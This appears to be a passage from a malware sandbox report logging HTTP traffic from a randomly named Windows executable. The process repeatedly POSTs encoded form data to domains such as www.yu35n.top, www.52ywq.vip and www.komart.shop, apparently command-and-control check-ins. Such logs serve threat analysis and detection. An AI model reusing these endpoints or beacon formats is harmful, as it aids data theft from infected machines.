                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.84975038.47.232.144806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:16.511149883 CEST1753OUTPOST /wqu9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.yu35n.top
                                                              Origin: http://www.yu35n.top
                                                              Referer: http://www.yu35n.top/wqu9/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 51 42 53 6a 73 67 57 76 52 4e 34 35 31 6b 30 75 36 67 46 6c 7a 66 75 4a 6e 74 52 4a 6e 58 38 5a 36 69 73 5a 6e 71 47 35 65 67 61 4f 31 59 35 71 75 77 53 71 49 4a 74 63 6c 4c 6c 36 4e 69 78 2b 66 70 4f 79 48 37 4f 4d 75 4d 6f 48 5a 70 75 30 56 75 69 6e 42 35 44 58 7a 4d 4d 58 4c 53 63 77 73 42 61 78 35 57 33 6a 6c 51 59 72 78 75 76 39 48 67 6e 42 46 39 42 54 5a 4a 58 65 72 65 44 39 4e 4b 44 74 46 65 35 52 59 77 77 79 70 4e 2f 65 67 4d 5a 4e 4e 71 76 4c 69 61 2f 30 6e 4a 57 74 75 57 50 30 69 77 43 41 34 49 64 45 48 73 6d 53 7a 42 33 35 47 45 6d 69 51 62 76 6d 65 78 50 31 74 7a 36 55 35 41 38 39 41 30 76 58 57 64 55 4f 42 57 58 67 63 46 50 49 67 53 44 61 75 51 32 56 30 48 6c 77 2b 69 45 44 37 54 71 33 31 36 59 76 55 69 6f 58 34 49 39 77 6b 58 78 4a 35 37 77 62 37 41 63 6f 73 64 68 45 65 50 4a 6c 4f 46 4a 6e 6a 76 54 57 2b 6a 7a 48 57 61 33 44 35 66 58 46 4f 42 47 52 59 74 61 75 33 2b 75 54 65 57 34 7a 54 5a 49 58 4d 7a 5a 39 68 71 41 64 61 49 2f 74 58 79 55 44 43 51 48 70 38 36 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=QBSjsgWvRN451k0u6gFlzfuJntRJnX8Z6isZnqG5egaO1Y5quwSqIJtclLl6Nix+fpOyH7OMuMoHZpu0VuinB5DXzMMXLScwsBax5W3jlQYrxuv9HgnBF9BTZJXereD9NKDtFe5RYwwypN/egMZNNqvLia/0nJWtuWP0iwCA4IdEHsmSzB35GEmiQbvmexP1tz6U5A89A0vXWdUOBWXgcFPIgSDauQ2V0Hlw+iED7Tq316YvUioX4I9wkXxJ57wb7AcosdhEePJlOFJnjvTW+jzHWa3D5fXFOBGRYtau3+uTeW4zTZIXMzZ9hqAdaI/tXyUDCQHp86FtR107YvFpsgqzGH82yt6rUNESq8bgoQ7li9qnC4GEIlgtLYg57tdho04sVDR/hQ0UbiSUCjhvlS7dxQqF/w5BtY11tykY4U+uhNYWZalnkBBx4w9/S0AdN3h67Ql9xTRvLaAY75YSoKzoKw5UvYdCQk0iNP2AnJF5nI58A3jVftIA0Lm8aTKqsasi9SmA536d4hrJwuEvvdTAOvlHFEPsajqmpEDfi34jmhK7C8wSTzvthGmf5GCw8tnouMbhY00mqYg5socEptVcnQL1MhimA+lQLNKuCBKnqTJW4RubRomUFeYiY7hsKYPxJht/FH40NravUMOtipnfGi6eWBckEF9DVlQxJVj3ThPSXv+FI48bFpyNLaPlifbdU2N7LifVet3Iced0CeQ2TrNAuKU736kqGXGZdmAH6bicWS8qiFINX5PoqNikw0lUp4UVrEhvxCo6L5QzAcmMqfamsEXzrdRwc6g/AQW0PjQVarHnbk1WTb3gQ2M0vm7m3hppsFothmefFUsI8qkuTrFByxU4qAnUpD7q0QApkyns3wM5ChJLrngtRsxHqG3/5QmkHKDXXIHU/QQ+XSs6VTPo9yul1OZtAg6ZeDNjfAf4OsP0jTZHxG8sEtZnjBdWZDYXK/CRbKCAYJ1NqSqU5iaZgfqtiWUKCoAFtPfb [TRUNCATED]
                                                              Sep 25, 2024 09:18:17.408889055 CEST312INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.84975138.47.232.144806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:19.052855968 CEST469OUTGET /wqu9/?Ux_TPFo=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.yu35n.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:19.934047937 CEST312INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.84975252.230.28.86806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:24.990870953 CEST716OUTPOST /ujoo/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.52ywq.vip
                                                              Origin: http://www.52ywq.vip
                                                              Referer: http://www.52ywq.vip/ujoo/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 70 45 76 53 4c 6d 4b 62 37 38 45 38 53 5a 47 6e 79 50 74 5a 6b 4f 67 63 43 65 70 74 74 36 36 42 32 73 54 54 79 68 7a 56 4e 6d 2b 35 6d 4e 67 71 50 59 36 57 78 7a 32 56 66 47 69 54 7a 4c 30 41 79 32 2f 61 79 7a 34 6d 74 71 67 6d 30 35 6f 65 67 71 4d 56 43 76 42 2b 73 52 51 36 70 4d 74 34 36 6f 72 4f 44 4d 78 6f 41 61 79 62 41 2f 30 64 66 76 63 61 77 57 79 6f 6f 71 48 42 34 51 34 58 53 76 57 69 66 51 67 61 65 49 30 47 73 65 57 2f 42 34 6a 6e 7a 34 45 74 7a 6e 76 50 67 59 56 59 53 7a 37 4d 7a 63 57 65 77 4f 37 33 64 33 6b 4b 64 6d 66 57 57 48 4d 30 75 4a 6e 2b 36 6f 74 7a 73 44 2f 4f 41 43 4d 3d
                                                              Data Ascii: Ux_TPFo=pEvSLmKb78E8SZGnyPtZkOgcCeptt66B2sTTyhzVNm+5mNgqPY6Wxz2VfGiTzL0Ay2/ayz4mtqgm05oegqMVCvB+sRQ6pMt46orODMxoAaybA/0dfvcawWyooqHB4Q4XSvWifQgaeI0GseW/B4jnz4EtznvPgYVYSz7MzcWewO73d3kKdmfWWHM0uJn+6otzsD/OACM=
                                                              Sep 25, 2024 09:18:26.069722891 CEST359INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/
                                                              Server: CDNRay
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.84975352.230.28.86806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:27.545758963 CEST736OUTPOST /ujoo/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.52ywq.vip
                                                              Origin: http://www.52ywq.vip
                                                              Referer: http://www.52ywq.vip/ujoo/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 70 45 76 53 4c 6d 4b 62 37 38 45 38 41 6f 32 6e 77 75 74 5a 6a 75 67 66 4f 2b 70 74 6b 61 36 4e 32 74 76 54 79 67 6d 51 4e 30 61 35 6d 76 34 71 4f 5a 36 57 79 7a 32 56 4c 32 69 73 2b 72 30 4a 79 33 44 53 79 79 55 6d 74 72 45 6d 30 38 4d 65 67 5a 55 53 42 66 42 47 6e 78 51 34 6e 73 74 34 36 6f 72 4f 44 4d 31 52 41 61 71 62 41 76 45 64 66 4e 30 5a 7a 57 79 76 2f 61 48 42 38 51 35 65 53 76 57 4d 66 55 70 53 65 4d 45 47 73 66 6d 2f 43 73 50 67 36 34 45 6a 75 58 75 7a 68 4b 4a 64 61 53 32 70 37 4f 36 46 37 39 50 50 52 68 4a 67 48 45 58 51 56 48 6b 66 75 4b 50 49 2f 66 77 62 32 67 76 2b 65 56 62 65 41 4b 62 4e 4b 63 30 39 38 65 39 4c 46 78 4b 6e 6e 51 66 6f
                                                              Data Ascii: Ux_TPFo=pEvSLmKb78E8Ao2nwutZjugfO+ptka6N2tvTygmQN0a5mv4qOZ6Wyz2VL2is+r0Jy3DSyyUmtrEm08MegZUSBfBGnxQ4nst46orODM1RAaqbAvEdfN0ZzWyv/aHB8Q5eSvWMfUpSeMEGsfm/CsPg64EjuXuzhKJdaS2p7O6F79PPRhJgHEXQVHkfuKPI/fwb2gv+eVbeAKbNKc098e9LFxKnnQfo
                                                              Sep 25, 2024 09:18:28.619735956 CEST359INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/
                                                              Server: CDNRay
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.84975452.230.28.86806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:30.088362932 CEST1753OUTPOST /ujoo/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.52ywq.vip
                                                              Origin: http://www.52ywq.vip
                                                              Referer: http://www.52ywq.vip/ujoo/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 70 45 76 53 4c 6d 4b 62 37 38 45 38 41 6f 32 6e 77 75 74 5a 6a 75 67 66 4f 2b 70 74 6b 61 36 4e 32 74 76 54 79 67 6d 51 4e 30 53 35 6d 61 6b 71 50 37 53 57 7a 7a 32 56 58 6d 69 58 2b 72 31 5a 79 32 72 6f 79 79 6f 32 74 6f 73 6d 31 61 41 65 6f 49 55 53 61 50 42 47 6f 52 51 39 70 4d 74 70 36 6f 36 48 44 4d 46 52 41 61 71 62 41 74 63 64 64 66 63 5a 2f 32 79 6f 6f 71 48 64 34 51 35 79 53 75 79 36 66 55 73 77 66 39 34 47 73 2f 32 2f 41 66 33 67 6e 49 46 46 76 58 75 72 68 4b 45 4e 61 53 72 57 37 4b 36 37 37 39 33 50 54 33 6f 6a 61 45 54 55 50 6e 67 49 74 4c 2f 59 33 73 34 6e 37 67 54 46 63 48 7a 37 4b 39 62 6c 46 4b 38 6c 35 75 30 45 54 77 32 4c 6d 31 61 55 65 54 52 46 2f 6d 32 6a 5a 2b 53 45 31 37 72 4c 70 62 67 38 36 6c 61 2b 4f 35 64 39 34 6c 54 31 4c 7a 6a 4f 59 52 4d 6b 76 2f 57 75 51 33 66 6b 57 52 46 45 34 50 43 74 51 64 68 42 78 6b 76 30 69 46 43 51 79 6a 31 4e 51 58 38 2f 70 61 4f 7a 30 5a 6b 37 53 66 54 68 70 59 2b 74 4d 6a 74 37 6f 6f 67 63 6f 39 58 4c 37 65 45 66 77 53 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=pEvSLmKb78E8Ao2nwutZjugfO+ptka6N2tvTygmQN0S5makqP7SWzz2VXmiX+r1Zy2royyo2tosm1aAeoIUSaPBGoRQ9pMtp6o6HDMFRAaqbAtcddfcZ/2yooqHd4Q5ySuy6fUswf94Gs/2/Af3gnIFFvXurhKENaSrW7K67793PT3ojaETUPngItL/Y3s4n7gTFcHz7K9blFK8l5u0ETw2Lm1aUeTRF/m2jZ+SE17rLpbg86la+O5d94lT1LzjOYRMkv/WuQ3fkWRFE4PCtQdhBxkv0iFCQyj1NQX8/paOz0Zk7SfThpY+tMjt7oogco9XL7eEfwShS/cLy/v29z1yjyx/u5vkBxcK4LXbXHeal3nHDsCxSx2HCiRE3rTWlkRMjLfNNQ7+0CRH7NsVDRowhxnwdu54krT5ozhzz91JJ5PnJ8Fg/b9kdRZMUe7/PAi5Z6ru6PibeKhnlJPoKtIIYaxu5QLdPFGxw27HczS3EY9ehALEl4ZDtyr89rHeFJ6KfvZ+bDDFPUXJNg0C/pcOlksvpNSPN9Ii2avCNxLkh6FewimcKZJ/rYJETYPum6joKlESI5K5eZvnDREa72ucO40x8ncK/PPfsXSgbWM/o1uglfdGJyhWmJnaiifr1xfaQ1jVUvBSXw8RAO83FyGnZx1LeYXKyPwoJPg6bVZCKHKGkVBbpjrx3xCveoBk0hxpwhy1vzXUQ6iF3b1aD+8w/SkFM7VMcZQ9v4wepVwi5wHhtEYwBh4BY9dDW2jCNGKo9pjn1gme5x9Dbm+TSclv+K35mYEFMyLvdF4W6AxthqAkdm371pyf9hHNKiJRQRCIBgZSNUgh3hNKZAYsC3jP/P5z8Jiz8VYKY0dV27tVvrkNwGqj4hcfqUkpkexK5n+OT+Ju5XV4b4aGAOmd1b6yYmDOM/1GiQLRsg3kUyHalMxJ781aHn0GuMdBsUuB7LQtyJmEZVwTid8FkJBpD0XGbrOm77SycBuSXnd0yQbuz [TRUNCATED]
                                                              Sep 25, 2024 09:18:31.152923107 CEST359INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/
                                                              Server: CDNRay
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.84975552.230.28.86806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:32.660769939 CEST469OUTGET /ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC+k3iYjthOPfxR3hOlb9i/x9FbCM9gWjU2jH2bxpk27YwwYDjrUExqEoirVxd+JcnloOoNZ40tu8bNN8NKiaeO1oTtxon0OItavvmTQbTg==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.52ywq.vip
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:33.704677105 CEST519INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:33 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC+k3iYjthOPfxR3hOlb9i/x9FbCM9gWjU2jH2bxpk27YwwYDjrUExqEoirVxd+JcnloOoNZ40tu8bNN8NKiaeO1oTtxon0OItavvmTQbTg==&FvypB=88kTDXb8k4dH
                                                              Server: CDNRay
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.849756133.130.35.90806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:40.073472023 CEST722OUTPOST /ypa3/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.komart.shop
                                                              Origin: http://www.komart.shop
                                                              Referer: http://www.komart.shop/ypa3/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4a 76 48 37 6c 68 6e 35 59 75 77 48 52 38 44 37 69 67 32 65 64 66 32 7a 4b 32 55 64 6d 36 36 62 5a 63 57 39 38 72 46 4a 79 5a 6d 44 32 30 7a 48 4e 4b 4c 68 6d 6f 30 4b 34 58 56 38 4b 69 64 2f 7a 57 31 6e 56 68 58 47 71 4c 53 36 66 7a 74 69 2f 53 47 37 34 67 59 7a 59 74 37 47 38 59 57 38 55 45 2b 56 72 67 4c 65 76 38 2b 38 33 61 31 6a 2b 72 62 66 36 37 39 66 37 2f 72 6f 52 6a 42 72 64 4d 42 6b 31 6b 73 79 55 58 44 46 4e 4a 4c 5a 56 30 4f 52 6c 7a 71 43 50 4b 36 69 55 36 4e 6c 77 7a 74 37 57 49 36 35 42 47 68 56 51 44 4e 47 45 54 2f 6a 46 32 61 74 6f 75 44 61 43 5a 58 31 6b 30 34 33 2f 72 67 3d
                                                              Data Ascii: Ux_TPFo=JvH7lhn5YuwHR8D7ig2edf2zK2Udm66bZcW98rFJyZmD20zHNKLhmo0K4XV8Kid/zW1nVhXGqLS6fzti/SG74gYzYt7G8YW8UE+VrgLev8+83a1j+rbf679f7/roRjBrdMBk1ksyUXDFNJLZV0ORlzqCPK6iU6Nlwzt7WI65BGhVQDNGET/jF2atouDaCZX1k043/rg=
                                                              Sep 25, 2024 09:18:40.853210926 CEST668INHTTP/1.1 404 Not Found
                                                              content-encoding: gzip
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:40 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 454
                                                              connection: close
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                              Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.849757133.130.35.90806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
